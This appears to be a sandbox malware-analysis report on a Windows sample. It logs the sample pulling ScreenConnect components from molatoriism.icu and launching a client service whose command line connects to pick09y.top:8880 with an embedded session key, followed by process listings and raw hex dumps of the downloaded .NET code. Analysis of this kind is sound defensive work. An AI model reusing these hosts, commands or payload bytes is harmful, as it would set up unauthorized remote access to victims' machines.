                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B4b7XmZcC9%2BzfSzVziSH%2FtJjo827fJ36kR3pSjtdjHX%2FnHQMfRJyuVCnraPttkF2PBOwqZm3tb1APRBAeWFBmlMA4Ecx3Y99XZ1W9kv9t2FjCnhPTFBRyWudDx9ZstSiVLU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee7572cec6b52-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1075&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=714&delivery_rate=2576512&cwnd=223&unsent_bytes=0&cid=a7a8eaf9c1acde54&ts=642&x=0"
                                                                                                                                                                              Data Ascii: -&~+s%G(+(+}q~(o,(-r{.s(+-H((I,!(H}ps(+-+ {ps+{s+s}rs( +s((!+~H%-&~+s%H
                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 73 01 01 00 0a 25 80 4d 00 00 04 28 2e 00 00 2b 28 2f 00 00 2b 13 0a 09 11 0a 66 5f 16 13 0b 28 30 00 00 2b 6f 04 01 00 0a 13 0c 38 96 00 00 00 11 0c 6f 05 01 00 0a 13 0d 12 01 28 8a 00 00 0a 08 11 0d 02 fe 06 10 00 00 06 73 06 01 00 0a 06 7b 77 00 00 04 25 2d 18 26 06 06 fe 06 c6 00 00 06 73 be 00 00 0a 25 13 0f 7d 77 00 00 04 11 0f 06 7b 78 00 00 04 25 2d 18 26 06 06 fe 06 c7 00 00 06 73 07 01 00 0a 25 13 10 7d 78 00 00 04 11 10 28 61 00 00 06 13 0e 11 0e 2c 2a 11 0e 02 7b 08 00 00 04 6f 60 00 00 06 17 13 0b 02 7b 07 00 00 04 11 0e 6f 08 01 00 0a de 0b 26 11 0e 16 6f 62 00 00 06 de 00 11 0c 6f 11 00 00 0a 3a 5e ff ff ff de 0c 11 0c 2c 07 11 0c 6f 10 00 00 0a dc 11 0b 2c 41 02 7b 08 00 00 04 7e 4e 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 8b 00 00 06 73
                                                                                                                                                                              Data Ascii: s%M(.+(/+f_(0+o8o(s{w%-&s%}w{x%-&s%}x(a,*{o`{o&obo:^,o,A{~N%-&~+s
                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 0a 25 03 7b 31 01 00 0a 6f 32 01 00 0a 25 03 7b 33 01 00 0a 6f 34 01 00 0a 25 03 7b 35 01 00 0a 6f 36 01 00 0a 25 03 7b 37 01 00 0a 6f 38 01 00 0a 25 02 03 7b 37 01 00 0a 03 7b 35 01 00 0a 28 15 00 00 06 6f 39 01 00 0a 2a 00 00 1b 30 03 00 64 00 00 00 11 00 00 11 28 3a 01 00 0a 0a 06 02 28 27 00 00 06 28 3b 01 00 0a 0b 07 28 3c 01 00 0a 28 3d 01 00 0a 26 de 14 07 2c 06 07 6f 10 00 00 0a dc 06 2c 06 06 6f 10 00 00 0a dc 7e 3e 01 00 0a 72 20 03 00 70 17 6f 3f 01 00 0a 0c 08 2d 02 de 18 08 02 28 27 00 00 06 28 40 01 00 0a de 0a 08 2c 06 08 6f 10 00 00 0a dc 2a 01 28 00 00 02 00 13 00 0e 21 00 0a 00 00 00 00 02 00 06 00 25 2b 00 0a 00 00 00 00 02 00 46 00 13 59 00 0a 00 00 00 00 c6 03 02 7b 08 00 00 04 7e 44 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 81 00 00
                                                                                                                                                                              Data Ascii: %{1o2%{3o4%{5o6%{7o8%{7{5(o9*0d(:('(;(<(=&,o,o~>r po?-('(@,o*(!%+FY{~D%-&~+
                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 13 08 11 08 7b 63 01 00 0a 12 09 fe 15 1a 00 00 01 11 09 28 64 01 00 0a 2c 0c 11 08 7b 65 01 00 0a 39 c6 00 00 00 02 7b 17 00 00 04 7e 90 00 00 04 25 2d 17 26 7e 8a 00 00 04 fe 06 d8 00 00 06 73 58 01 00 0a 25 80 90 00 00 04 28 3f 00 00 2b 11 07 7b 99 00 00 04 25 2d 1a 26 11 07 11 07 fe 06 e4 00 00 06 73 58 01 00 0a 25 13 0a 7d 99 00 00 04 11 0a 28 3f 00 00 2b 6f 60 01 00 0a 13 06 2b 50 11 06 6f 61 01 00 0a 13 0b 28 66 01 00 0a 11 0b 7b 82 00 00 04 11 07 7c 98 00 00 04 7b 65 01 00 0a 6f 67 01 00 0a 11 0b 7b 82 00 00 04 6f 68 01 00 0a de 1c 26 11 0b 7b 7f 00 00 04 1b 2e 08 11 0b 1a 7d 7f 00 00 04 11 0b 28 37 00 00 06 de 00 11 06 6f 11 00 00 0a 2d a7 dd 04 ff ff ff 11 06 2c 07 11 06 6f 10 00 00 0a dc 02 28 55 01 00 0a 07 15 6a 2e 16 28 97 00 00 0a 6f fc 00
                                                                                                                                                                              Data Ascii: {c(d,{e9{~%-&~sX%(?+{%-&sX%}(?+o`+Poa(f{|{eog{oh&{.}(7o-,o(Uj.(o
                                                                                                                                                                              2024-11-07 17:04:40 UTC1369INData Raw: 0a 02 28 4a 00 00 06 25 2d 04 26 14 2b 05 6f 25 00 00 0a 02 06 06 6f 1e 01 00 0a 28 81 01 00 0a 28 82 01 00 0a 2a 13 30 05 00 23 00 00 00 18 00 00 11 12 01 fe 15 73 00 00 01 12 01 02 7d 83 01 00 0a 07 0a 14 03 19 12 00 17 28 84 01 00 0a 28 82 01 00 0a 2a 00 13 30 05 00 23 00 00 00 18 00 00 11 12 01 fe 15 73 00 00 01 12 01 02 7d 83 01 00 0a 07 0a 14 03 19 12 00 17 28 85 01 00 0a 28 82 01 00 0a 2a 00 1b 30 06 00 89 00 00 00 19 00 00 11 12 02 fe 15 74 00 00 01 12 02 02 7d 86 01 00 0a 12 02 03 7d 87 01 00 0a 12 02 17 7d 88 01 00 0a 12 02 04 7d 89 01 00 0a 08 0a 14 17 12 00 12 01 28 8a 01 00 0a 28 82 01 00 0a 05 2d 4b 7e 8b 01 00 0a 72 5e 04 00 70 17 17 17 28 8c 01 00 0a 0d 17 1a 73 8d 01 00 0a 13 04 09 28 3c 01 00 0a 02 16 1a 11 04 6f 8e 01 00 0a 1a 28 8f 01
                                                                                                                                                                              Data Ascii: (J%-&+o%o((*0#s}((*0#s}((*0t}}}}((-K~r^p(s(<o(


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49764 | 172.67.182.214 | 443 | 7120 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 17:04:41 UTC | 93 | OUT | GET /Bin/ScreenConnect.Windows.dll HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip
2024-11-07 17:04:41 UTC | 775 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 17:04:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Cache-Control: private
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FUrl74SWZg%2FqXPCEzi5n295GwuEG34gbm1%2FhaXuVT1G%2FpT8192Ub6eSpuueEuuHB6DX6TjEUYMo4oiBWjnr9M4HRGcrjuzVhDMO42whJb8lJBr%2BQhIWMoKJDxX%2BF1EjD5Xg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8deee762bf1f4787-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1855&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=708&delivery_rate=1577342&cwnd=251&unsent_bytes=0&cid=0be78ab4a89b4fc2&ts=629&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49795 | 172.67.182.214 | 443 | 7120 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-07 17:04:47 UTC | 99 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip
2024-11-07 17:04:47 UTC | 794 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 17:04:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Cache-Control: private
CF-Cache-Status: BYPASS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DazlSI0fnQmk0Z9i5QdG3AfPXkycR%2FEyXQU0ixrHE7uiXd9YWau6d8Akl2tt3en8kRH%2FePY0946N2Nud85l%2B136fcZwWsqSWY%2BlrdXiuYkn7xw8IJHpt5Ab5IU1SnqYYwxw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8deee789a99d6b38-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1287&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=714&delivery_rate=2269592&cwnd=251&unsent_bytes=0&cid=07332de5b5f03cae&ts=318&x=0"
                                                                                                                                                                              Data Ascii: * )UUZ(G{soKX )UUZ(I{toLX*0brEp%{s%q44-&+4oM%{t%q55-&+5oM(N*(u*^(u2%} *:(u} *:(u}!*^(u3%}"*:(
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: 8c ab 00 00 01 a2 73 3f 02 00 06 a2 25 17 72 1e 07 00 70 1a 8d 9f 00 00 01 25 16 16 73 9e 00 00 0a 8c ac 00 00 01 a2 25 17 17 73 9e 00 00 0a 8c ac 00 00 01 a2 25 18 18 73 9e 00 00 0a 8c ac 00 00 01 a2 25 19 19 73 9e 00 00 0a 8c ac 00 00 01 a2 73 3f 02 00 06 a2 25 18 72 48 07 00 70 19 8d 9f 00 00 01 25 16 1a 73 9f 00 00 0a 8c ad 00 00 01 a2 25 17 1f 0c 73 9f 00 00 0a 8c ad 00 00 01 a2 25 18 1f 24 73 9f 00 00 0a 8c ad 00 00 01 a2 73 3f 02 00 06 a2 25 19 72 88 07 00 70 12 00 fe 15 27 00 00 01 06 8c 27 00 00 01 73 35 02 00 06 a2 2a 00 13 30 06 00 93 00 00 00 14 00 00 11 02 28 a0 00 00 0a 16 6f a1 00 00 0a 02 28 03 00 00 2b 17 fe 01 6f a2 00 00 0a 02 28 a0 00 00 0a 17 6f a1 00 00 0a 02 28 a0 00 00 0a 18 6f a1 00 00 0a 02 28 a0 00 00 0a 19 6f a1 00 00 0a 02 28
                                                                                                                                                                              Data Ascii: s?%rp%s%s%s%ss?%rHp%s%s%$ss?%rp''s5*0(o(+o(o(o(o(
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: cc 00 00 0a 2b 14 03 03 7b cc 00 00 0a 12 09 28 d3 00 00 0a 58 7d cd 00 00 0a 12 09 28 d2 00 00 0a 02 6f d4 00 00 0a 13 0a 12 0a 28 d2 00 00 0a 32 31 04 1a 2e 04 04 1b 33 15 03 03 7b d1 00 00 0a 12 09 28 d2 00 00 0a 59 7d d0 00 00 0a 2a 03 03 7b d0 00 00 0a 12 09 28 d2 00 00 0a 58 7d d1 00 00 0a 2a 00 00 13 30 03 00 a6 00 00 00 19 00 00 11 02 03 04 28 85 04 00 06 0a 02 28 d5 00 00 0a 3a 90 00 00 00 06 1f 0a 33 1f 0f 01 28 cf 00 00 0a 02 28 d6 00 00 0a 0b 12 01 28 d2 00 00 0a 18 5b 30 03 1f 0d 2a 1f 10 2a 06 1f 0c 33 1f 0f 01 28 cb 00 00 0a 02 28 d6 00 00 0a 0b 12 01 28 d3 00 00 0a 18 5b 30 03 1f 0d 2a 1f 0e 2a 06 1f 0b 33 1f 0f 01 28 cf 00 00 0a 02 28 d6 00 00 0a 0b 12 01 28 d2 00 00 0a 18 5b 30 03 1f 0e 2a 1f 11 2a 06 1f 0f 33 1f 0f 01 28 cb 00 00 0a 02
                                                                                                                                                                              Data Ascii: +{(X}(o(21.3{(Y}*{(X}*0((:3((([0**3((([0**3((([0**3(
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: 2a 22 02 03 7d 32 00 00 04 2a 1e 02 28 f7 00 00 0a 2a 22 02 16 28 57 02 00 06 2a 1e 02 7b 33 00 00 04 2a 22 02 03 7d 33 00 00 04 2a 00 13 30 06 00 2b 02 00 00 1e 00 00 11 03 28 e7 04 00 06 6f 84 00 00 0a 03 18 6f f8 00 00 0a 03 19 6f f9 00 00 0a 7e fa 00 00 0a 72 d0 07 00 70 6f fb 00 00 0a 39 29 01 00 00 7e fa 00 00 0a 72 16 08 00 70 28 fc 00 00 0a 0c 08 39 13 01 00 00 08 6f fd 00 00 0a 6c 08 6f fe 00 00 0a 6c 5b 0d 0e 04 13 04 16 13 05 38 ec 00 00 00 11 04 11 05 a3 21 00 00 01 13 06 09 12 06 28 ff 00 00 0a 6c 12 06 28 00 01 00 0a 6c 5b 32 5f 12 06 28 01 01 00 0a 0f 03 28 cb 00 00 0a 59 12 06 28 02 01 00 0a 0f 03 28 cf 00 00 0a 59 6c 23 00 00 00 00 00 00 e0 3f 12 06 28 00 01 00 0a 6c 12 06 28 ff 00 00 0a 6c 09 5b 59 5a 58 28 03 01 00 0a 12 06 28 ff 00 00
                                                                                                                                                                              Data Ascii: *"}2*(*"(W*{3*"}3*0+(ooo~rpo9)~rp(9olol[8!(l(l[2_((Y((Yl#?(l(l[YZX((
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: 17 16 6f 21 01 00 0a 02 73 22 01 00 0a 28 e5 00 00 06 02 72 6e 08 00 70 17 28 23 01 00 0a 7d 49 00 00 04 02 72 90 08 00 70 17 28 23 01 00 0a 73 68 00 00 06 7d 4d 00 00 04 02 7e 98 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 14 07 00 06 73 24 01 00 0a 25 80 98 02 00 04 73 25 01 00 0a 7d 53 00 00 04 02 73 26 01 00 0a 7d 80 00 00 04 02 28 ae 00 00 06 02 fe 06 4f 01 00 06 73 27 01 00 0a 6f 28 01 00 0a 02 73 18 04 00 06 28 b5 00 00 06 02 28 b4 00 00 06 02 fe 06 50 01 00 06 73 29 01 00 0a 6f 2a 01 00 0a 02 28 b4 00 00 06 02 fe 06 51 01 00 06 73 2b 01 00 0a 6f 07 04 00 06 02 02 fe 06 f6 00 00 06 73 2c 01 00 0a 02 fe 06 f8 00 00 06 73 2d 01 00 0a 73 2e 01 00 0a 28 b9 00 00 06 02 02 fe 06 f7 00 00 06 73 2f 01 00 0a 73 07 02 00 06 28 b7 00 00 06 02 28 b6 00 00 06 02
                                                                                                                                                                              Data Ascii: o!s"(rnp(#}Irp(#sh}M~%-&~s$%s%}Ss&}(Os'o(s((Ps)o*(Qs+os,s-s.(s/s((
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: 6f 55 01 00 0a 11 07 6f 23 00 00 0a 2d df de 0c 11 07 2c 07 11 07 6f 22 00 00 0a dc 02 28 e0 00 00 06 28 1c 00 00 2b 6f 56 01 00 0a 13 08 2b 18 11 08 6f 57 01 00 0a 02 fe 06 01 01 00 06 73 1f 01 00 0a 6f 20 01 00 0a 11 08 6f 23 00 00 0a 2d df de 0c 11 08 2c 07 11 08 6f 22 00 00 0a dc 02 18 8d 55 02 00 01 25 16 1f 10 9e 25 17 1f 20 9e 7e 9b 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 17 07 00 06 73 58 01 00 0a 25 80 9b 02 00 04 28 1d 00 00 2b 28 1e 00 00 2b 28 1f 00 00 2b 7d 43 00 00 04 02 73 5a 01 00 0a 7d 44 00 00 04 7e aa 00 00 0a 6f 5b 01 00 0a 0a 06 39 86 00 00 00 02 73 5c 01 00 0a 7d 46 00 00 04 d0 9f 00 00 01 28 bf 00 00 0a 28 5d 01 00 0a 28 20 00 00 2b 13 09 06 18 8d 56 02 00 01 25 16 1f 2c 9d 25 17 1f 3b 9d 6f 5f 01 00 0a 13 0a 16 13 04 2b 40 73 26
                                                                                                                                                                              Data Ascii: oUo#-,o"((+oV+oWso o#-,o"U%% ~%-&~sX%(+(+(+}CsZ}D~o[9s\}F((]( +V%,%;o_+@s&


Session ID:12
Source IP:192.168.2.5
Source Port:49808
Destination IP:172.67.182.214
Destination Port:443
PID:7120
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp:2024-11-07 17:04:50 UTC
Bytes transferred:90
Direction:OUT
Data:
GET /Bin/ScreenConnect.Core.dll HTTP/1.1
Host: molatoriism.icu
Accept-Encoding: gzip

Timestamp:2024-11-07 17:04:50 UTC
Bytes transferred:769
Direction:IN
Data:
HTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:50 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fgx2iAaPlhDUtbQWTDVq24NbBnQTgr9K2VZf5IGGCOI5hDWxkya8Qb%2FjzqbSbsGhts7jABtAi8ZlRNW9Hg3H69E7ZDcyRTQ8gOGO8yj10NI9obT0j5DPv6QPYgtjdC0BbTk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee7993b0f6b04-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1209&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=705&delivery_rate=2264268&cwnd=233&unsent_bytes=0&cid=0b8fdc2acab3794a&ts=306&x=0"



                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:12:04:10
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\pzPO97QouM.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\pzPO97QouM.exe"
                                                                                                                                                                              Imagebase:0xf50000
                                                                                                                                                                              File size:83'336 bytes
                                                                                                                                                                              MD5 hash:47891CF8A43A19E066FE70E812982C98
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:1
                                                                                                                                                                              Start time:12:04:10
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                              Imagebase:0x2356cff0000
                                                                                                                                                                              File size:24'856 bytes
                                                                                                                                                                              MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.3886946834.000002350032E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:12:04:18
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:12:04:52
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                              Imagebase:0xdd0000
                                                                                                                                                                              File size:601'376 bytes
                                                                                                                                                                              MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000005.00000002.2472709033.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:6
                                                                                                                                                                              Start time:12:04:53
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                                                                                                                                                                              Imagebase:0x80000
                                                                                                                                                                              File size:95'520 bytes
                                                                                                                                                                              MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:12:04:53
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                                                                                                                                                                              Imagebase:0x80000
                                                                                                                                                                              File size:95'520 bytes
                                                                                                                                                                              MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:12:04:55
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:10
                                                                                                                                                                              Start time:12:04:55
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7c199985-91b6-43e6-a992-7121e466b299" "User"
                                                                                                                                                                              Imagebase:0x20000
                                                                                                                                                                              File size:601'376 bytes
                                                                                                                                                                              MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:11
                                                                                                                                                                              Start time:12:04:55
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5856 -ip 5856
                                                                                                                                                                              Imagebase:0xe40000
                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:12:04:55
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 316
                                                                                                                                                                              Imagebase:0xe40000
                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:13
                                                                                                                                                                              Start time:12:04:57
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
